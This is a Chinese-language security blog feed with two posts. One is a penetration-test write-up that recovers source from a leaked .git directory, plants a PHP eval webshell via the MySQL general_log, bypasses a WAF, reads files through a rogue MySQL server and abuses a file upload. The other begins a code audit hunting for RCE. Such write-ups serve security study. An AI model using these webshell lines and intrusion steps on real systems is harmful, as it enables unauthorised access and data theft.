          \u5927\u6982\u4e86\u89e3\u4e86\u4ee5\u4e0a\u5185\u5bb9\u540e\uff0c\u8fd8\u9700\u8981\u4e86\u89e3\u6709\u54ea\u4e9b\u6587\u4ef6\u624d\u80fd\u591f\u6062\u590d.git<\/code>?<\/p>\n\n
          \u9996\u5148\u6211\u4eec\u6765\u770b\u4e00\u4e0b.git<\/code>\u76ee\u5f55\u5185\u7684\u4e00\u822c\u7ed3\u6784:<\/p>\n\n\n  \n    \n      \n    \n      \n      \n      \n      \n      \n      \n      \n      
          \u540d\u79f0<\/th>\n      \u7c7b\u578b<\/th>\n      \u4f5c\u7528<\/th>\n    <\/tr>\n  <\/thead>\n  
          .git\/index<\/td>\n      \u6587\u4ef6<\/td>\n      \u6682\u5b58\u533a<\/td>\n    <\/tr>\n    
          .git\/config<\/td>\n      \u6587\u4ef6<\/td>\n      Git\u914d\u7f6e\u6587\u4ef6<\/td>\n    <\/tr>\n    
          .git\/description<\/td>\n      \u6587\u4ef6<\/td>\n      GitWeb\u4e13\u7528\u7684\u63cf\u8ff0\u6587\u4ef6<\/td>\n    <\/tr>\n    
          .git\/info<\/td>\n      \u6587\u4ef6\u5939<\/td>\n      \u91cc\u9762\u5c31\u4e00\u4e2aexclude\u6587\u4ef6\uff08\u4e0e.gitignore\u4e92\u8865\uff09\uff0c\u6392\u9664\u6307\u5b9a\u6587\u4ef6\u4e0d\u7528\u505aGit\u63d0\u4ea4<\/td>\n    <\/tr>\n    
          .git\/hooks<\/td>\n      \u6587\u4ef6\u5939<\/td>\n      \u5b58\u653e\u4e00\u4e9b\u94a9\u5b50\u811a\u672c<\/td>\n    <\/tr>\n    
          .git\/HEAD<\/td>\n      \u6587\u4ef6<\/td>\n      \u8bb0\u5f55\u5206\u652f<\/td>\n    <\/tr>\n    
          .git\/objects<\/td>\n      \u6587\u4ef6\u5939<\/td>\n      \u5b58\u653e\u6240\u6709\u6570\u636e<\/td>\n    <\/tr>\n    
          .git\/refs<\/td>\n      \u6587\u4ef6\u5939<\/td>\n      \u5b58\u653e\u63d0\u4ea4\u5bf9\u8c61\u7684\u6307\u9488<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>\n\n
          \u77e5\u9053\u7ed3\u6784\u53ca\u5176\u4f5c\u7528\u540e\uff0c\u6311\u91cd\u70b9\u5173\u6ce8objects<\/code>\u8fd9\u4e2a\u76ee\u5f55\uff0c\u4f46\u4e00\u770b\uff0c\u5168\u90fd\u662f\u4e00\u4e9bHash\u547d\u540d\u7684\u6587\u4ef6\uff0c\u6839\u672c\u4e0d\u77e5\u9053\u5176\u5bf9\u5e94\u5173\u7cfb:<\/p>\n\n
          \"-w1102\"<\/p>\n\n
          \u5e76\u4e14\u8fd9\u4e9b\u6587\u4ef6\u90fd\u6ca1\u529e\u6cd5\u770b:<\/p>\n\n
          \"-w822\"<\/p>\n\n
          \u67e5\u9605\u76f8\u5173\u8d44\u6599\u5f97\u77e5\u6b64\u7c7b\u6587\u4ef6\u662f\u5c06\u539f\u6587\u4ef6\u5185\u5bb9\u7ecf\u8fc7zlib<\/code>\u7684deflate<\/code>\u538b\u7f29\u540e\u5b58\u50a8\u7684( https:\/\/mirrors.edge.kernel.org\/pub\/software\/scm\/git\/docs\/user-manual.html#object-details ):<\/p>\n\n
          \"-w1145\"<\/p>\n\n
          \u800c\u4f7f\u7528zlib<\/code>\u8fdb\u884c\u89e3\u538b\u67e5\u770b\u6587\u4ef6\u5185\u5bb9\u65f6\u662f\u8fd9\u6837\u7684:<\/p>\n\n
          \"-w1222\"<\/p>\n\n
          \u8fd9\u4e2a\u6587\u4ef6\u66f4\u50cf\u662f\u8bb0\u5f55\u4e86\u4e00\u4e2a\u76ee\u5f55\u7ed3\u6784\uff0c\u800c\u5173\u4e8e\u6b64\u5c31\u53c8\u9700\u8981\u67e5\u9605\u8d44\u6599\u4e86\uff0c\u5177\u4f53\u8bf7\u770b: https:\/\/git-scm.com\/book\/zh\/v2\/Git-%E5%86%85%E9%83%A8%E5%8E%9F%E7%90%86-Git-%E5%AF%B9%E8%B1%A1<\/p>\n\n
          git\u4e2d\u7684\u5bf9\u8c61(\u5bf9\u8c61\u5bf9\u5e94\u6587\u4ef6<\/strong>).git\/objects<\/code>\u5305\u542b\u4e86:<\/p>\n\n
            \n  
          1. SHA(\u6240\u6709\u7528\u6765\u8868\u793a\u9879\u76ee\u5386\u53f2\u4fe1\u606f\u7684\u6587\u4ef6,\u662f\u901a\u8fc7\u4e00\u4e2a40\u4e2a\u5b57\u7b26\u7684\uff0840-digit\uff09\u201c\u5bf9\u8c61\u540d\u201d\u6765\u7d22\u5f15\u7684)<\/li>\n  
          2. Blob\u5bf9\u8c61(\u7528\u6765\u5b58\u50a8\u6587\u4ef6\u7684\u5185\u5bb9)<\/li>\n  
          3. Tree\u5bf9\u8c61(\u6709\u4e00\u4e32bunch\u6307\u5411Blob\u5bf9\u8c61\u6216\u662f\u5176\u5b83Tree\u5bf9\u8c61\u7684\u6307\u9488\uff0c\u4e00\u822c\u8868\u793a\u5185\u5bb9\u4e4b\u95f4\u7684\u76ee\u5f55\u5c42\u6b21\u5173\u7cfb)<\/li>\n  
          4. Commit\u5bf9\u8c61(\u6307\u5411\u4e00\u4e2aTree\u5bf9\u8c61, \u5e76\u4e14\u5e26\u6709\u76f8\u5173\u7684\u63cf\u8ff0\u4fe1\u606f.)<\/li>\n<\/ol>\n\n
            \"-w481\"\n(\u6ce8: \u56fe\u7247\u6765\u81ea git-scm.com )<\/p>\n\n
            \u731c\u6d4b<\/strong>: \u6309\u7167\u8fd9\u4e2a\u903b\u8f91\uff0c\u6211\u4eec\u9700\u8981\u5148\u83b7\u53d6Commit<\/code>\u5bf9\u8c61\u5bf9\u5e94\u6587\u4ef6\u627e\u5230Tree<\/code>\u5bf9\u8c61\u5bf9\u5e94\u6587\u4ef6\u518d\u901a\u8fc7\u5176\u83b7\u5f97Blob<\/code>\u5bf9\u8c61\u5bf9\u5e94\u6587\u4ef6\uff0c\u6700\u540e\u89e3\u538b\u5373\u53ef\u83b7\u5f97\u6e90\u6587\u4ef6\u5185\u5bb9\u3002<\/p>\n\n
            \u90a3\u8fd9\u4e9b\u5bf9\u8c61\u5185\u5bb9\u90fd\u5b58\u50a8\u5728\u54ea\u91cc\u5462\uff1f\u901a\u8fc7\u4e4b\u524d\u4f7f\u7528Binwalk<\/code>\u5206\u6790\uff0c\u663e\u800c\u6613\u89c1\uff0c\u5728.git\/index<\/code>\u6587\u4ef6\u4e2d\u3002<\/p>\n\n
            \u4f46\u662f\u5728\u8fd9\u91cc.git\/index<\/code>\u6587\u4ef6\u65e0\u6cd5\u76f4\u63a5\u67e5\u770b\uff0c\u76f4\u63a5\u5957\u7528GitHack<\/code>\u7684( https:\/\/github.com\/lijiejie\/GitHack\/blob\/master\/lib\/parser.py )\u89e3\u6790\u4ee3\u7801\u5c31\u884c:<\/p>\n\n
            \"-w716\"<\/p>\n\n
            \u83b7\u5f97SHA1: a797b1973fd62dc34a691c7fe3bce33a504f2b74<\/code>\uff0c\u4f46\u662f\u627e\u4e86\u534a\u5929\u6ca1\u627e\u5230\u8fd9\u4e2a\u5bf9\u5e94\u6587\u4ef6\u200b\uff0c\u540e\u6765\u5c1d\u8bd5\u641c\u7d22\u524d\u51e0\u4f4d\u548c\u540e\u51e0\u4f4d\uff0c\u53d1\u73b0\u641c\u7d22\u5230\u4e86\u540e\u51e0\u4f4d:<\/p>\n\n
            \"-w664\"<\/p>\n\n
            \u5bf9\u6bd4\u53d1\u73b0\u6587\u4ef6\u540d\u548c\u83b7\u53d6\u7684SHA1\u503c\u5c11\u4e862\u4f4d:<\/p>\n\n
            \"-w387\"<\/p>\n\n
            \u641c\u7d22\u53d1\u73b0\u539f\u6765\u524d\u4e24\u4f4d\u662f\u4f5c\u4e3a\u4e86\u76ee\u5f55\u540d:<\/p>\n\n
            \"-w556\"<\/p>\n\n
            \u4f46\u5728\u8fd9\u91cc\uff0c\u6211\u4eec\u4f7f\u7528zlib<\/code>\u53bb\u89e3\u538b\u7f29\uff0c\u53d1\u73b0\u5b58\u50a8\u5728.git\/index<\/code>\u7684SHA1\u503c\u5b9e\u9645\u4e0a\u5c31\u662f\u4e00\u4e2ablob<\/code>\u5bf9\u8c61\u7684\u503c\uff0c\u4e5f\u5c31\u6839\u672c\u4e0d\u9700\u8981\u83b7\u53d6commit<\/code>\u3001tree<\/code>\u5bf9\u8c61\u7684\u503c\u4e86\uff0c\u8868\u793a\u4e4b\u524d\u7684\u987a\u5e8f\u9006\u63a8\u903b\u8f91\u662f\u9519\u8bef\u7684:<\/p>\n\n
            \"-w746\"<\/p>\n\n
            \u63a5\u4e0b\u6765\u6309\u7167\u8fd9\u4e2a\u601d\u8def\u53bb\u7f16\u5199\u811a\u672c\u6062\u590d\u6e90\u7801\u5373\u53ef\u3002<\/p>\n\n
            \u7f16\u5199\u4e0e\u6062\u590d<\/strong><\/p>\n\n
            \u7531\u4e8e\u9879\u76ee\u65f6\u95f4\u539f\u56e0\u7b80\u5355\u4e86\u89e3\u539f\u7406\u4e4b\u540e\uff0c\u6ca1\u6709\u8fc7\u591a\u7684\u53bb\u7814\u7a76\uff0c\u4e5f\u4e0d\u6253\u7b97\u4f7f\u7528\u539f\u751f\u65b9\u6cd5\u53bb\u6062\u590d\uff0c\u8fd8\u662f\u91c7\u7528\u6700\u66b4\u529b\u7684\u65b9\u6cd5\uff0c\u4f7f\u7528\u547d\u4ee4\u884c\u53bb\u6062\u590d.git<\/code>\uff0c\u60f3\u8981\u8ba9Git\u56de\u9000\u5386\u53f2\uff0c\u4f7f\u7528git reset --hard commit_id<\/code>\u547d\u4ee4\uff0c\u8fdb\u884c\u7248\u672c\u56de\u9000\u3002<\/p>\n\n
            \u57fa\u4e8e\u8fd9\u4e2a\u547d\u4ee4\uff0c\u6211\u9700\u8981\u83b7\u53d6\u7f51\u7ad9\u7684\u8fd9\u51e0\u4e2a\u6587\u4ef6\/\u76ee\u5f55:<\/p>\n\n
              \n  
            1. .git\/index<\/code><\/li>\n  
            2. .git\/logs<\/code><\/li>\n  
            3. .git\/head<\/code><\/li>\n  
            4. .git\/objects<\/code><\/li>\n  
            5. .git\/refs<\/code><\/li>\n<\/ol>\n\n
              \u5148\u4e0b\u8f7d.git\/index<\/code>\u3001.git\/head<\/code>\u3001.git\/refs<\/code>\u3001.git\/logs<\/code>(\u6587\u4ef6\u76ee\u5f55\u90fd\u662f\u56fa\u5b9a\u7684\u65e0\u9700\u8003\u8651\u5176\u4ed6\u60c5\u51b5)\u800c\u540e\u89e3\u6790index<\/code>\u83b7\u53d6\u7d22\u5f15\uff0c\u6839\u636e\u7d22\u5f15\u4f9d\u6b21\u4e0b\u8f7d.git\/objects<\/code>\u5185\u7684\u6587\u4ef6\uff0c\u6700\u540e\u5168\u90e8\u4e0b\u8f7d\u5b8c\u6bd5\uff0c\u83b7\u53d6master<\/code>\u5206\u652f(refs\/heads\/master<\/code>\u6587\u4ef6)\u5bf9\u5e94\u7684\u503c\u5e26\u5165\u8be5\u547d\u4ee4git reset --hard commit_id<\/code>\u5373\u53ef\u6062\u590d:<\/p>\n\n
              \"-w793\"<\/p>\n\n
              \u4f46\u53d1\u73b0\u9664\u6b64\u4e4b\u5916\uff0c\u53d1\u73b0\u6062\u590d\u7684\u6587\u4ef6\u5be5\u5be5\u65e0\u51e0\uff0c\u540e\u6765\u4e0b\u8f7d.git\/logs\/head<\/code>\u53d1\u73b0\u8be5.git<\/code>\u9879\u76ee\u8fd8\u6709\u5176\u4ed6\u5206\u652f:<\/p>\n\n
              \"-w742\"<\/p>\n\n
              \u8fd9\u4e2a\u8bb0\u5f55\u4e2d\u6709\u4e24\u4e2aSHA1\u7684\u503c\uff0cmaster<\/code>\u5bf9\u5e94\u524d\u8005\uff0cshop<\/code>\u5bf9\u5e94\u540e\u8005\uff0c\u7b80\u5355\u4fee\u6539\u547d\u4ee4git reset --hard shop_commit_id<\/code>\uff0c\u8fd8\u662f\u90a3\u4e00\u5957\u6d41\u7a0b\uff0c\u6062\u590dshop<\/code>\u8fd9\u4e2a\u5206\u652f\u7684\u6e90\u7801\u5373\u53ef\u3002<\/p>\n\n
              \u83b7\u53d6\u5b50\u57df Webshell<\/h3>\n\n
              \u83b7\u5f97\u6e90\u7801\u4e4b\u540e\u7ffb\u6570\u636e\u5e93\u8d26\u53f7\u5bc6\u7801:<\/p>\n\n
              \"-w307\"<\/p>\n\n
              \u7531\u4e8e\u4e4b\u524d\u6211\u4eec\u5df2\u7ecf\u6709\u4e86\u4e00\u4e2aphpinfo()<\/code>\u63a2\u9488\uff0c\u7f51\u7ad9\u7edd\u5bf9\u8def\u5f84\u5df2\u77e5\uff0c\u6240\u4ee5\u76f4\u63a5\u4e0aphpMyAdmin<\/code>\u767b\u5f55\uff0c\u5c1d\u8bd5\u4f7f\u7528into outfile<\/code>\uff0c\u6709--secure-file-priv<\/code>\u9650\u5236\u65e0\u6cd5\u5199\u5165:<\/p>\n\n
              \"-w767\"<\/p>\n\n
              \u8f6c\u800c\u4f7f\u7528Mysql Log\u65e5\u5fd7\u5b58\u50a8\u7684\u65b9\u5f0f\u8fdb\u884c\u5199\u5165:<\/p>\n\n
              set global general_log=on;\nset global_log_file='\/xxx\/www\/xxx.php';\nselect '<?php @eval($_REQUEST[\"xxx\"]);?>';\n<\/code><\/pre>\n\n
              \u8bbf\u95ee\u76f8\u5173\u6587\u4ef6\u5374\u63d0\u793a\u6211\u65e0\u6cd5\u8bbf\u95ee(403\/AccessDefined<\/strong>):<\/p>\n\n
              \"\"<\/p>\n\n
              \u9047\u5230\u8fd9\u79cd\u60c5\u51b5\u5c1d\u8bd5\u4ee5\u4e0b\u51e0\u79cd\u65b9\u6cd5:<\/p>\n\n
                \n  
              1. \u4fee\u6539\u540e\u7f00\u8bbf\u95ee\uff0c\u5224\u65ad\u662f\u5426\u662f\u53ea\u9488\u5bf9\u811a\u672c\u540e\u7f00\u8fdb\u884c\u9650\u5236\uff08\u4e0a\u4f20.htaccess\u6587\u4ef6\uff09<\/li>\n  
              2. \u4fee\u6539\u5185\u5bb9\u8bbf\u95ee\uff0c\u5224\u65ad\u662f\u5426\u6709\u5b89\u5168\u9632\u62a4\u5bf9\u5185\u5bb9\u8fdb\u884c\u9650\u5236<\/li>\n  
              3. \u5982\u82e5\u4ee5\u4e0a\u5747\u672a\u8bbf\u95ee\u6210\u529f\uff0c\u5219\u53ef\u4ee5\u8003\u8651\u8986\u76d6\u539f\u6587\u4ef6\u5199\u5165<\/li>\n<\/ol>\n\n
                \u8fd9\u91cc\u6211\u7684\u60c5\u51b5\u662f\u7b2c\u4e09\u79cd\uff0c\u5927\u6982\u63a8\u6d4b\u53ef\u80fd\u662f\u56e0\u4e3a\u65b0\u5efa\u7684\u6587\u4ef6\u6ca1\u6709\u6267\u884c\u6743\u9650\u6240\u5bfc\u81f4\uff0c\u56e0\u4e3a\u8fd9\u91cc\u6211\u4eec\u5df2\u7ecf\u6709\u6e90\u7801\u4e86\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u627e\u5df2\u6709\u7684\u6587\u4ef6(\u5efa\u8bae\u9009\u62e9\u975e\u4e1a\u52a1\u76f8\u5173\u7684\u6587\u4ef6<\/strong>)\u8fdb\u884c\u5199\u5165(\u8bb0\u5f97\u4e8b\u540e\u6062\u590d<\/strong>):<\/p>\n\n
                \"-w562\"<\/p>\n\n
                \u6267\u884cphpinfo();<\/code>\u51fd\u6570\u53ef\u4ee5\uff0c\u4f46\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528\u7ba1\u7406\u5de5\u5177\u8fde\u63a5\uff0c\u6293\u5305\u53d1\u73b0\u76ee\u6807\u7f51\u7ad9\u4e0a\u4e86\u4e91WAF\uff0c\u5bf9\u8bf7\u6c42\u5185\u5bb9\u62e6\u622a\u4e86(\u8be5WAF\u8fd8\u633a\u5f31)\uff0c\u8fd9\u79cd\u60c5\u51b5\u8fd8\u662f\u6709\u5f88\u591a\u4e2d\u65b9\u5f0f:<\/p>\n\n
                  \n  
                1. \u914d\u5408Cknife\u3001\u8681\u5251\u7b49\u81ea\u5b9a\u4e49\u4fee\u6539\u4f20\u8f93\u5185\u5bb9(Base64\u7f16\u7801\u7b49\u7b49)\uff0c\u4f46\u9700\u8981\u4fee\u6539PHP\u6587\u4ef6\u5185\u5bb9\u914d\u5408\u89e3\u7801<\/li>\n  
                2. \u76f4\u63a5\u4e0a\u51b0\u874e\u3001\u54e5\u65af\u62c9\u7684\u9a6c\u5c31\u884c\u4e86<\/li>\n<\/ol>\n\n
                  \u4e3a\u56fe\u65b9\u4fbf\uff0c\u9009\u62e9\u51b0\u874e3<\/code>\uff0c\u4f7f\u7528file_put_contents<\/code>\u5199\u5165\u8fde\u63a5\u5c31\u884c(\u8fd9\u90fd\u4e0d\u62e6\uff0cWAF\u582a\u5fe7):<\/p>\n\n
                  \"-w362\"<\/p>\n\n
                  \"-w699\"<\/p>\n\n
                  \u7784\u51c6\u9776\u6807<\/h3>\n\n
                  \u8fdb\u5165\u5b50\u57df\u7684Webshell\u53d1\u73b0\u5185\u7f51\u65e0\u673a\u5668\u3001\u5c31\u662f\u4e00\u4e2a\u4e91\u670d\u52a1\u5668\uff0c\u4e00\u5f00\u59cb\u8bef\u4ee5\u4e3a\u6253\u4e2d\u9776\u6807\uff0c\u56e0\u4e3a\u5728\u4e3b\u6218\u53d1\u73b0\u4e00\u4e2a\u8def\u5f84\u6cc4\u6f0f:<\/p>\n\n
                  \"-w503\"<\/p>\n\n
                  \"-w170\"<\/p>\n\n
                  \u800c\u5b50\u57df\u670d\u52a1\u5668\u4e0a\u4e5f\u6709\u5bf9\u5e94\u76ee\u5f55\u5e76\u4e14\u6587\u4ef6\u4e00\u6a21\u4e00\u6837\uff0c\u4f46\u662f\u4fee\u6539\u6587\u4ef6\u5374\u6ca1\u53cd\u5e94\u4e0d\u751f\u6548\uff0c\u731c\u6d4b\u5f88\u6709\u53ef\u80fd\u4e3b\u6218\u4e1a\u52a1\u66fe\u7ecf\u5728\u8fd9\u4e2a\u5b50\u57df\u670d\u52a1\u5668\u4e0a\uff0c\u4f46\u540e\u671f\u8fdb\u884c\u4e86\u8f6c\u79fb\uff0c\u539fWeb\u6587\u4ef6\u8fd8\u7559\u7740\u3002<\/p>\n\n
                  \u5c1d\u8bd5\u7ffb\u7ffb\u6e90\u7801\uff0c\u627e\u5bc6\u7801\uff0c\u540e\u6765\u627e\u5230\u4e86\u51e0\u4e2a\u6709\u7528\u7684\u4e1c\u897f:1.Adminer\u6587\u4ef6 2.\u6570\u636e\u914d\u7f6e\u4fe1\u606f<\/p>\n\n
                  \"-w500\"<\/p>\n\n
                  Adminer<\/code>\uff08\u7c7b\u4f3cphpMyAdmin\u7684\u6570\u636e\u5e93\u7ba1\u7406\u5de5\u5177\uff09\u6587\u4ef6\u662f\u968f\u673a\u7684: adminerxxxxxxxxx.php<\/code>\uff0c\u5b8c\u5168\u65e0\u6cd5\u626b\u5230\uff0c\u6570\u636e\u5e93\u914d\u7f6e\u5bc6\u7801\u4e0e\u5b50\u57df\u5b8c\u5168\u4e00\u6837\u3002<\/p>\n\n
                  \"-w626\"<\/p>\n\n
                  \u4f7f\u7528\u6570\u636e\u914d\u7f6e\u5bc6\u7801\u65e0\u6cd5\u767b\u5f55\uff0c\u4f46\u662f\u8fd9\u91ccAdminer<\/code>\u53ef\u4ee5\u76f4\u63a5\u8fde\u5916\u7f51\u7684Mysql<\/code>\u6570\u636e\u5e93\uff0c\u4f7f\u7528\u811a\u672c( https:\/\/github.com\/Gifts\/Rogue-MySql-Server )\u4f2a\u9020\u4e00\u4e2aMysql\u670d\u52a1\u7aef\u8bfb\u53d6\u5bf9\u5e94\u6587\u4ef6\u5c31\u597d\uff0c\u8fd9\u8fb9\u4ee5\/etc\/passwd<\/code>\u4e3a\u4f8b:<\/p>\n\n
                  \"-w599\"<\/p>\n\n
                  \u5982\u4e0a\u56fe\u6240\u793a\u662f\u6210\u529f\u8bfb\u53d6\u5230\u7684\uff0c\u800c\u6211\u4eec\u5728\u5b50\u57df\u4e0a\u4e5f\u77e5\u9053\u4e86\u5bf9\u5e94\u7684\u914d\u7f6e\u6587\u4ef6\u8def\u5f84\uff0c\u76f4\u63a5\u4f2a\u9020\u8bfb\u53d6\u5373\u53ef\u3002<\/p>\n\n
                  \u518d\u4f7f\u7528Adminer\u767b\u5f55\u8fdb\u53bb\u65f6\uff0c\u4f7f\u7528\u5982\u4e0b\u51e0\u79cd\u65b9\u6cd5\u5c1d\u8bd5\u83b7\u53d6Webshell:<\/p>\n\n
                    \n  
                  1. into outfile -> \u5931\u8d25<\/li>\n  
                  2. Mysql log -> \u5931\u8d25<\/li>\n  
                  3. Adminer\u662f\u6700\u65b0\u7248\u672c\u65e0\u6f0f\u6d1e -> \u5931\u8d25<\/li>\n  
                  4. \u83b7\u53d6\u7ba1\u7406\u5458\u5bc6\u7801\u65e0\u6cd5\u89e3\u5bc6 -> \u5931\u8d25<\/li>\n<\/ol>\n\n
                    \u6700\u7ec8\u9009\u62e9\u6dfb\u52a0\u65b0\u7ba1\u7406\u5458\u767b\u5f55:<\/p>\n\n
                    \"-w592\"<\/p>\n\n
                    \u767b\u5f55\u4e4b\u540e\u5bfb\u627e\u5bf9\u5e94\u4e0a\u4f20\u70b9(\u4ee5\u6700\u77ed\u653b\u51fb\u8def\u5f84\u7684\u65b9\u5f0f\u8fdb\u884cGetWebShell):<\/p>\n\n
                    \"-w551\"<\/p>\n\n
                    \u6d4b\u8bd5\u5982\u4e0b\u540e\u7f00\u53ca\u670d\u52a1\u5668\u7ed3\u679c:<\/p>\n\n
                    Key.jpg -> \u4e0a\u4f20\u6210\u529f\nKey.php -> \u4e0a\u4f20\u5931\u8d25WAF\u62e6\u622a\nKey.phtml -> \u4e0a\u4f20\u5931\u8d25\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\n<\/code><\/pre>\n\n
                    \"-w474\"<\/p>\n\n
                    \"-w356\"<\/p>\n\n
                    \u6211\u4eec\u5728\u5df2\u7ecf\u6709\u6e90\u7801\u7684\u60c5\u51b5\u4e0b\uff0c\u627e\u5230\u5bf9\u5e94\u7684\u4ee3\u7801\u8fdb\u884c\u5ba1\u8ba1\u5c31\u884c\uff0c\u53d1\u73b0\u8fd9\u91cc\u662f\u767d\u540d\u5355\u8bbe\u7f6e\u65e0\u6cd5\u7ed5\u8fc7:<\/p>\n\n
                    \"\"<\/p>\n\n
                    \u76f4\u63a5\u5173\u952e\u8bcd\u5bfb\u627e\u4e0a\u4f20\u529f\u80fd\uff0c\u53d1\u73b0\u51fd\u6570:xxx_upload_file<\/code>\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20<\/p>\n\n
                    \"\"<\/p>\n\n
                    \u540e\u7eed\u6784\u5efa\u8bf7\u6c42\u5305\u4ee5\u53ca\u4f7f\u7528\u56de\u8f66\u76f4\u63a5\u7ed5\u8fc7CloudWAF<\/code>\uff0c\u4e0a\u4f20\u6210\u529f:<\/p>\n\n
                    \"\"<\/p>\n\n
                    \"-w436\"<\/p>\n\n
                    \u81f3\u6b64\u9776\u6807\u62ff\u5230\uff0c\u7ed3\u675f\u3002<\/p>\n\n
                    \u6587\u672b<\/h1>\n\n
                    \u5f88\u591a\u65f6\u5019\u8fd8\u662f\u9700\u8981\u53bb\u63a2\u5bfb\u4e8b\u7269\u7684\u672c\u8d28\u548c\u539f\u7406\uff0c\u624d\u80fd\u66f4\u52a0\u6e05\u6670\u660e\u4e86\u7684\u4e86\u89e3\u8fd9\u4e2a\u4e8b\u7269\uff0c\u5426\u5219\u4ec0\u4e48\u4e1c\u897f\u90fd\u662f\u73b0\u6709\u7684\u6210\u54c1\u4e00\u628a\u68ad\uff0c\u9047\u5230\u68ad\u4e0d\u4e86\uff0c\u5bb9\u6613\u51fa\u73b0\u60ef\u6027\u601d\u7ef4\uff0c\u53ef\u80fd\u5c31\u76f4\u63a5\u7565\u8fc7\u4e86\u3002<\/p>\n\n","pubDate":"2020-11-22T00:00:00+08:00","link":"https:\/\/gh0st.cn\/archives\/2020-11-22\/1","guid":"https:\/\/gh0st.cn\/archives\/2020-11-22\/1"},{"title":"\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u6316\u6398\uff08RCE\uff09","description":"
                    \u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u4ee3\u7801\u5ba1\u8ba1\u6316\u6398\uff08RCE\uff09<\/h1>\n\n
                    \u524d\u8a00<\/h2>\n\n
                    \u7ee7\u4e0a\u4e00\u6b21\u5bf9\u67d0\u7ec8\u7aef\u68c0\u6d4b\u54cd\u5e94\u5e73\u53f0\u6743\u9650\u7ed5\u8fc7<\/strong>\u6f0f\u6d1e\u7684\u5ba1\u8ba1\u6d41\u7a0b\uff0c\u73b0\u5206\u4eab\u5bf9\u8be5\u5e73\u53f0\u8fdb\u884c\u4ee3\u7801\u5ba1\u8ba1\u540e\u6316\u6398\u5230\u7684\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<\/p>\n\n
                    \u4e0a\u7bc7\u6587\u7ae0\u5176\u5b9e\u91c7\u7528\u7684\u662f\u901a\u8bfb\u4ee3\u7801\u903b\u8f91\u7684\u65b9\u6cd5\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u90a3\u4e48\u672c\u6b21\u6211\u4eec\u4f7f\u7528\u654f\u611f\u51fd\u6570\u56de\u6eaf\u7684\u65b9\u6cd5\uff08\u4ee3\u7801\u5ba1\u8ba1\u65b9\u6cd5\u901a\u5e38\u5206\u4e3a\u4e09\u7c7b: \u901a\u8bfb\u5168\u6587\u3001\u654f\u611f\u51fd\u6570\u53c2\u6570\u56de\u6eaf\u3001\u5b9a\u5411\u529f\u80fd\u5206\u6790\uff09\u6765\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\u3002<\/p>\n\n
                    \u5ba1\u8ba1\u6d41\u7a0b<\/h2>\n\n
                    \u5b9a\u4f4d\u654f\u611f\u51fd\u6570<\/h2>\n\n
                    \u524d\u6587\u8bf4\u5230\uff0c\u4e0d\u662f\u4e00\u628a\u68ad\u76840day\u90fd\u4e0d\u53eb0day\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u5bf9\u547d\u4ee4\u6267\u884c\u3001\u4ee3\u7801\u6267\u884c\u7b49\u6f0f\u6d1e\u76f8\u5173\u654f\u611f\u51fd\u6570\u8fdb\u884c\u5168\u6587\u641c\u7d22\uff0c\u654f\u611f\u51fd\u6570\u5217\u8868\u5982\u4e0b :<\/p>\n\n
                    exec()\npassthru()\nproc_open()\nshell_exec()\nsystem()\npopen()\neval() \/\/\u975e\u51fd\u6570\nassert()\npreg_replace()\n<\/code><\/pre>\n\n
                    \u641c\u7d22\u5173\u952e\u8bcd exec(<\/code>\uff0c\u53d1\u73b0\u4e00\u5904\u6587\u4ef6 \/ldb\/dc.php<\/code> \u81ea\u5b9a\u4e49\u4e86\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff0c\u51fd\u6570\u4f53\u662f\u8c03\u7528\u7684 exec<\/code> \u51fd\u6570 :<\/p>\n\n
                    \/**\n * \u6267\u884c\u5916\u90e8\u7a0b\u5e8f\n * @param string $command \u6267\u884c\u547d\u4ee4\n * @param array  $output  \u8f93\u51fa\u4fe1\u606f\n * @param int    $ret     \u8fd4\u56de\u503c\n * @return string \u8fd4\u56de\u6267\u884c\u7ed3\u679c\n *\/\nfunction ldb_exec($command, &$output, &$ret) {\n    if (!ldb_is_linux()) {\n        $data = exec($command, $output, $ret);\n    } else {\n        pcntl_signal(SIGCHLD, SIG_DFL);\n        $data = exec($command, $output, $ret);\n        pcntl_signal(SIGCHLD, SIG_IGN);\n    }\n    return $data;\n}\n<\/code><\/pre>\n\n
                    \u5bfb\u627e\u5371\u9669\u70b9<\/h2>\n\n
                    \/bin\/mapreduce\/app\/web\/device_linkage\/process_cssp.php<\/h3>\n\n
                    exec_slog_action \u533f\u540d\u51fd\u6570\u5206\u6790<\/h4>\n\n
                    \u5982\u4e0a\u6240\u8ff0\uff0c\u6211\u4eec\u77e5\u9053\u4e86 ldb_exec<\/code> \u51fd\u6570\u4e3a\u81ea\u5b9a\u4e49\u547d\u4ee4\u6267\u884c\u4ee3\u7801\uff0c\u6211\u4eec\u60f3\u5bfb\u627e\u5229\u7528\u70b9\u5c31\u9700\u8981\u8ddf\u8e2a\u4e0b\u8be5\u51fd\u6570\u5728\u54ea\u88ab\u5f15\u7528\uff0c\u7136\u540e\u5206\u6790\u5177\u4f53\u7684\u4ee3\u7801\u770b\u662f\u5426\u53ef\u4ee5\u5229\u7528\u3002<\/p>\n\n
                    \u8001\u5957\u8def\uff0c\u5168\u5c40\u641c\u7d22 ldb_exec(<\/code> \u53d1\u73b0\u6709\u5f88\u591a\u5904\u8c03\u7528\u4e86\uff0c\u5176\u4e2d\u9605\u8bfb\u8d77\u6765\u8f83\u4e3a\u901a\u4fd7\u6613\u61c2\u7684\u4e3a \/bin\/mapreduce\/app\/web\/device_linkage\/process_cssp.php<\/code> \u7684\u533f\u540d\u51fd\u6570 $exec_slog_action<\/code> :<\/p>\n\n
